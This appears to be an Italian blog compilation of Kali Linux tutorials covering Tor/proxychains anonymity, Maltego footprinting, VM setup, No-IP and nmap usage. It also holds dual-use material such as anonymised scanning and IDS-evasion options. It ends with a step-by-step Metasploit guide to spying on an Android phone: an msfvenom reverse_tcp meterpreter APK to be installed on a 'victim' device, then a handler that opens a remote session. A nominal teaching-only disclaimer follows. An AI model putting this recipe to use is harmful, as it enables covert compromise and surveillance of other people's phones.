Anonimato su Kali Linux

Anonimato su Kali Linux

L’anonimato è uno degli elementi più importanti durante la navigazione o l’esecuzione di alcuni test.

Anche se l’anonimato completo è un errore, grazie ad alcune accortezze è possibile diminuire il rischio di tracciabilità.

In questo articolo vedremo come rendere anonima ogni azione effettuata dal nostro terminale.

Proxychains & TOR

L’unione di questi due elementi riesce a rendere le nostre azioni decisamente meno tracciabili:

  • Proxychains: Trasmette le connessioni avviate dalle applicazioni tramite server proxy come SOCKS4, SOCKS5 e HTTP (S).
  • TOR: Servizio proxy che permette l’accesso alla rete TOR, clicca qui per più informazioni.

Installazione e configurazione TOR

TOR è già installato in kali linux in caso contrario digitare il comando:

sudo apt-get install tor

Per gestire il funzionamento del servizio TOR eseguire in terminale i seguenti comandi:

Determinare lo stato di attività del servizio:

service tor status

Bloccare il servizio:

service tor stop

Avviare il servizio:

service tor start

Ricaricare il servizio (assegna così un nuovo ip):

service tor force-reload

Installazione e configurazione Proxychains

Proxychains è già installato in kali linux in caso contrario digitare il comando:

sudo apt-get install proxychains

Determiniamo la posizione dei file di configurazione di proxychains con il comando:

locate proxychains
In evidenza posizione file di configurazione

Una volta determinata la posizione del file di configurazione, eseguiamo il comando:

leafpad /etc/proxychains.conf

Aggiungiamo in basso la stringa (nel caso in cui non sia già presente): socks4 127.0.0.1 9050

Salviamo e a questo punto possiamo testare se proxychains e TOR funzionano digitando i comandi:

Per avere in output il nostro ip reale:

curl ifconfig.me

Per avere come risultato il nostro ip mascherato da TOR:

proxychains curl ifconfig.me

Con questo è facile intuire come proxychains va utilizzato. Basta inserire prima del comando la voce proxychains, ad esempio:

proxychains nmap scanme.nmap.org

Avviare ogni connessione http sotto proxy TOR:

Entriamo in impostazioni di rete:

Clicchiamo sull’ingranaggio alla destra di Proxy di rete.

Settiamo il proxy di rete su Manuale e inseriamo in Host SOCKS l’ip: 127.0.0.1 e la porta 9050

Per determinare se l’ip è stato cambiato basta visitare questa pagina: Clicca Qui

Maltego

Maltego

Cos’è Maltego

Maltego è uno strumento di analisi sviluppato per il pentesting e l’uso forense, il suo scopo principale è la raccolta delle informazione sulla base di analisi dei collegamenti e data mining. Viene utilizzato da professionisti nei settori riguardanti il pen testing e l’informatica forense.

A cosa serve

Consente di generare una mappa dettagliata delle ralazione che si creano fra domini, infrastrutture, ip, persone fisiche, social-network e altre affiliazioni con servizi online, numeri di telefono e e-mail

Come usarlo

Digitiamo in terminale il comando:

maltego

Dopo qualche secondo di caricamento vi si presenterà questa schermata:

Selezioniamo Maltego CE, ma prima di accedere abbiamo bisogno di un account, puoi crearlo da QUI

Inseriamo i nostri dati come mostrato nella seguente figura:

Una volta effettuato l’accesso clicchiamo su Machines e successivamente Run Machine.

Selezioniamo in base alle nostre preferenze una delle macchine d’analisi disponibili, nel nostro caso potrebbe esserci utile il footprinting di un dominio, ossia estrapolare le relazioni di un dominio a una persona alle sue email e alle infrastrutture di rete. Selezioniamo dunque footprint L3 (la differenza fra i vari livelli da 1 a 3 sta nella complessita con cui maltego controllerà le relazioni). Qui di seguito possiamo vedere un grafico generato da Maltego

 

Installare Kali Linux in Virtual Machine

Installare Kali Linux in Virtual Machine

L’installazione di Kali Linux in virtual machine permette l’utilizzo del sistema operativo targato Offencive Security direttamente all’interno di windows senza troppi sforzi.

E’ un’ottima soluzione se non si vuole in alcun modo abbandonare windows e senza ovviamente fare a meno di tutti i tool offerti da Kali.

Occorrente

VMware Workstation

Kali Linux Custom Image

Procedura

  1. Scarichiamo ed installiamo VMware (scegliamo l’ultima versione corrispondente all’architettura del nostro sistema)
  2. Scarichiamo Kali-Linux VMware 64-Bit [OVA] (Corrispondente all’architettura del nostro sistema se avete dubbi scaricate la versione a 32 bit)
  3. Avviato VMware dirigiamoci in: Player FileOpen…
  4. Dalla finestra che appare dirigiamoci nella cartella in cui abbiamo scaricato l’immagine OVA di kali linux e selezioniamo l’immagine del sistema
  5. Una volta selezionata apparirà una piccola finestra in cui possiamo scegliere il percorso nel quale installare il nostro sistema, spetta a voi decidere dove.
  6. Scelta la posizione in cui installare la nostra immagine di sistema clicchiamo su Import
  7. Una volta terminato il processo di installazione non ci resta altro che avviare la nostra macchina virtuale.
  8. Ci chiederà di inserire un username e una password: Username ‘root’ , Password ‘toor’ (senza ‘)
  9. Avrete sicuramente notato che il sistema utilizza la tastiera USA Cambiamola:
    1. In alto a destra clicchiamo sulla freccetta bianca che punta verso il basso
    2. Ora clicchiamo sul simbolo che raffigura un giravite incrociato ad una chiave inglese
    3. Dirigiamoci in Region & Language
    4. Nella finestra appena apparsa sotto la voce Input Sources clicchiamo sul tasto + in basso a sinistra
    5. Clicchiamo su i 3 puntini in basso e cerchiamo Italian – Italia – Add (in alto a destra)
    6. Selezioniamo ora l’input inglese (English US) e clicchiamo sul tasto –
    7. FATTO
  10. Adesso dobbiamo solo aggiornare il sistema dunque:
    1. Avviamo il terminale
    2. Digitiamo i comandi:
      1. apt-get update
      2. apt-get upgrade
      3. apt dist-upgrade
    3. Può capitare spesso di incappare in alcuni errori durante il processo di update (spesso causato dalle chiavi obsolete): The following signatures were invalid: EXPKEYSIG…
      1. Visitiamo questa pagina:
      2. Copiamo l’indirizzo del file terminante in .deb
      3. digitiamo in terminale wget seguito dall’indirizzo appena copiato:
        wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
      4. Una volta terminato il download digitiamo:
        apt install ./[nome_del_file_scaricato.deb]: apt install ./kali-archive-keyring_2018.1_all.deb
      5. Adesso possiamo riprovare il punto 10 – B di questa guida
DNS e IP

DNS e IP

Prima di procedere dovremmo sapere che differenza c’è fra IP e DNS:

  • IP o Internet Protocol address: E’ un insieme di 4 serie numeriche divise da un punto composte da una o tre cifre (192.88.1.1). Lo scopo di queste cifre è identificare univocamente una macchina connessa alla rete e la rete stessa. Possiamo dunque immaginare l’IP come la targa di una macchina, ogni auto esistente ha la propria e univoca che la identifica.
  • DNS o Domain Name System: E’ il collegamento dell’indirizzo IP ad uno nominativo. Per ritornare all’esempio di prima, per indicare l’automobile di un nostro amico non diremmo mai la sua targa, risulterebbe complicato ricordarla, dunque trasformiamo la targa “zy986ya” in “l’auto di Marco”, molto piu semplice da capire e da ricordare. La stessa cosa vale per gli indirizzi IP, trasformando ad esempio 89.46.106.52 in www.manuscavelli.it.

Per sapere qual è il tuo IP visita questa pagina.

No-IP

Il problema che può sorgere quando si utilizza l’IP della propria linea per accessi remoti è il fatto che questo possa variare ad ogni nuova connessione oltre a quello di doverlo ricordare.

Per evitare questo abbiamo bisogno di un DNS che si aggiorni ad ogni variazione dell’IP. Entra in nostro soccorso No-IP.

No-IP ci permette di creare un DNS gratuitamente e di collegarlo al nostro o ad un IP a piacere.

Come fare:

  1. Visita il sito: https://www.noip.com/it-IT
  2. Iscriviti e conferma l’email
  3. Raggiunto il pannello iniziale inseriamo un hostname a piacimento in: Aggiungere Velocemente
  4. Clicca sul tasto Aggiungi Hostname
  5. Ora visita la pagina: https://www.noip.com/it-IT/download
  6. Scarica e installa il software di No-IP
  7. Una volta avviato accedi con le tue credenziali
  8. Seleziona l’host appena creato dalla lista host

Da adesso in poi potrai utilizzare il tuo DNS personale al posto dell’IP.

NMAP: Cos’è?

NMAP: Cos’è?

NMAP sta per (Network Mapper), è un tool preinstallato su kali linux, viene utilizzato per individuare falle di sicurezza dunque, test di penetrazione, scansiona una rete di computer per rilevare host e servizi, creando così una “mappa” della rete.

Le funzionalità
  • Identificazione degli host su una rete.
  • L’enumerazione delle porte di un host.
  • Rilevamento versione, dunque il nome e la versione dei servizi attivi su una rete.
  • Rilevamento del sistema operativo e degli hardware di una macchina.
Usi di Nmap
  • Controllo della sicurezza di un dispositivo, in modo da avere una panoramica delle connessioni che potrebbero avvenire con la nostra macchina.
  • Identificazione delle porte aperte su un host.
  • Inventario di rete, identificazione delle macchine.
  • Controllo della sicurezza di una rete.
  • Generazione del traffico verso gli host su una rete, analisi e misurazione dei tempi di risposta
  • Trovare e sfruttare le vulnerabilità di una rete.
Come si presenta

Può essere utilizzato anche con GUI avviando zenmap!

Per avviare nmap basta eseguire il comando:

nmap
specifiche target:
  • -iL <inputfilename>: Input from list of hosts/networks
  • -iR <num hosts>: Choose random targets
  • –exclude <host1[,host2][,host3],…>: Exclude hosts/networks
  • –excludefile <exclude_file>: Exclude list from file
Ricerca host:
  • -sL: List Scan – simply list targets to scan
  • -sn: Ping Scan – disable port scan
  • -Pn: Treat all hosts as online — skip host discovery
  • -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  • -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  • -PO[protocol list]: IP Protocol Ping
  • -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  • –dns-servers <serv1[,serv2],…>: Specify custom DNS servers
  • –system-dns: Use OS’s DNS resolver
  • –traceroute: Trace hop path to each host
Tecniche di scanning:
  • -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  • -sU: UDP Scan
  • -sN/sF/sX: TCP Null, FIN, and Xmas scans
  • –scanflags <flags>: Customize TCP scan flags
  • -sI <zombie host[:probeport]>: Idle scan
  • -sY/sZ: SCTP INIT/COOKIE-ECHO scans
  • -sO: IP protocol scan
  • -b <FTP relay host>: FTP bounce scan
specifiche delle porte e ordine di range:
  • -p <port ranges>: Only scan specified ports
  • Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  • –exclude-ports <port ranges>: Exclude the specified ports from scanning
  • -F: Fast mode – Scan fewer ports than the default scan
  • -r: Scan ports consecutively – don’t randomize
  • –top-ports <number>: Scan <number> most common ports
  • –port-ratio <ratio>: Scan ports more common than <ratio>
servizi e analisi delle versioni:
  • -sV: Probe open ports to determine service/version info
  • –version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  • –version-light: Limit to most likely probes (intensity 2)
  • –version-all: Try every single probe (intensity 9)
  • –version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  • -sC: equivalent to –script=default
  • –script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories
  • –script-args=<n1=v1,[n2=v2,…]>: provide arguments to scripts
  • –script-args-file=filename: provide NSE script args in a file
  • –script-trace: Show all data sent and received
  • –script-updatedb: Update the script database.
  • –script-help=<Lua scripts>: Show help about scripts.
rilevamento sistema operativo:
  • -O: Enable OS detection
  • –osscan-limit: Limit OS detection to promising targets
  • –osscan-guess: Guess OS more aggressively
tempi di risposta e performance:
  • -T<0-5>: Set timing template (higher is faster)
  • –min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
  • –min-parallelism/max-parallelism <numprobes>: Probe parallelization
  • -min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies probe round trip time.
  • –max-retries <tries>: Caps number of port scan probe retransmissions.
  • –host-timeout <time>: Give up on target after this long
  • –scan-delay/–max-scan-delay <time>: Adjust delay between probes
  • –min-rate <number>: Send packets no slower than <number> per second
  • –max-rate <number>: Send packets no faster than <number> per second
FIREWALL/IDS EVASION e SPOOFING:
  • -f; –mtu <val>: fragment packets (optionally w/given MTU)
  • D <decoy1,decoy2[,ME],…>: Cloak a scan with decoys
  • -S <IP_Address>: Spoof source address
  • -e <iface>: Use specified interface
  • -g/–source-port <portnum>: Use given port number
  • –proxies <url1,[url2],…>: Relay connections through HTTP/SOCKS4 proxies
  • –data <hex string>: Append a custom payload to sent packets
  • –data-string <string>: Append a custom ASCII string to sent packets
  • –data-length <num>: Append random data to sent packets
  • –ip-options <options>: Send packets with specified ip options
  • -ttl <val>: Set IP time-to-live field
  • –spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
  • –badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
  • -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.
  • -oA <basename>: Output in the three major formats at once
  • -v: Increase verbosity level (use -vv or more for greater effect)
  • -d: Increase debugging level (use -dd or more for greater effect)
  • –reason: Display the reason a port is in a particular state
  • –open: Only show open (or possibly open) ports
  • –packet-trace: Show all packets sent and received
  • –iflist: Print host interfaces and routes (for debugging)
  • –append-output: Append to rather than clobber specified output files
  • –resume <filename>: Resume an aborted scan
  • –stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
  • –webxml: Reference stylesheet from Nmap.Org for more portable XML
  • –no-stylesheet: Prevent associating of XSL stylesheet w/XML output
altri:
  • -6: Enable IPv6 scanning
  • -A: Enable OS detection, version detection, script scanning, and traceroute
  • –datadir <dirname>: Specify custom Nmap data file location
  • –send-eth/–send-ip: Send using raw ethernet frames or IP packets
  • –privileged: Assume that the user is fully privileged
  • –unprivileged: Assume the user lacks raw socket privileges
  • -V: Print version number
  • -h: Print this help summary page.

 

Comandi utili

Avere informazioni su un IP:

nmap --script whois-ip [xxx.xxx.xxx.xxx]
nmap --script whois-ip [www.hostbersaglio.xyz]

Scansionare un singolo IP:

nmap [xxx.xxx.xxx.xxx]

Scansionare un host:

nmap [www.hostbersaglio.xyz]

Scansionare una lista di ip e host savata su un documento di testo:

nmap -iL [percorso/lista_ip.txt]

Determinare servizi e sistema operativo:

nmap -A [xxx.xxx.xxx.xxx]
nmap -A [www.hostbersaglio.xyz]

Determinazione Servizi:

nmap -sV [xxx.xxx.xxx.xxx]
nmap -sV [www.hostbersaglio.xyz]

Determinazione servizi aggressiva:

nmap -sV --version-intensity 5 [xxx.xxx.xxx.xxx]
nmap -sV --version-intensity 5 [www.hostbersaglio.xyz]

Scansioneporte UDP:

nmap -sU [xxx.xxx.xxx.xxx]
nmap -sU [www.hostbersaglio.xyz]

Scansione porte TCP:

nmap -sT [xxx.xxx.xxx.xxx]
nmap -sT [www.hostbersaglio.xyz]

Scansione di una singola porta:

nmap -p [porta] [xxx.xxx.xxx.xxx]
nmap -p [porta] [www.hostbersaglio.xyz]

Scansione di un intervallo di porte:

nmap -p [porta-porta] [xxx.xxx.xxx.xxx]
nmap -p [porta-porta] [www.hostbersaglio.xyz]

Scansione delle porte più comuni:

nmap -F [xxx.xxx.xxx.xxx]
nmap -F [www.hostbersaglio.xyz]

Scansione di tutte le 65535 porte:

nmap -p- [xxx.xxx.xxx.xxx]
nmap -p- [www.hostbersaglio.xyz]

Rilevare i titoli di pagina HTTP

nmap --script = http-title [www.hostbersaglio.xyz]

Rilevare le web app da percorsi noti:

nmap --script=http-enum [www.hostbersaglio.xyz] (può provocare errori e generare numerosi 404)
Metasploit: Come spiare un dispositivo Android

Metasploit: Come spiare un dispositivo Android

Abbiamo già parlato di Metasplot e abbiamo visto come creare una backdoor per windows.

Per Android la cosa non cambia, il funzionamento è praticamente lo stesso.

Avviamo il terminale e dirigiamoci sulla nostra scrivania.

Adesso digitiamo il comando:

msfvenom -p android/meterpreter/reverse_tcp -a dalvik --platform android lhost=[il vostro ip] lport=[una porta] -o [nomefile].apk

Creato il nostro apk dobbiamo solo installarlo sul dispositivo della vittima.

 

 

 

 

 

 

 

 

Una volta installato avviamo la nostra console con il comando:

msfconsole

eseguiamo i seguenti comandi:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost [il tuo ip]
set lport [porta impostata prima]
run

A questo punto possiamo notare la sessione meterpreter avviata con l’ip vittima.

da adesso possiamo interagire con il dispositivo, digita il comando help per la lista completa dei comandi.

Leggi ancora a proposito di Metasploit!

Come difenderti da cose simili?? Leggi qui

ATTENZIONE: QUESTA GUIDA È STATA SCRITTA SOLO A SCOPO DIDATTICO NON MI ASSUMO NESSUNA RESPONSABILITÀ PER LE VOSTRE AZIONI ILLEGALI O DANNI CAUSATI. RICORDO CHE LA VIOLAZIONE DELLA PRIVACY E DANNI CAUSATI TRAMITE MEZZI INFORMATICI, SONO PUNITI PENALMENTE!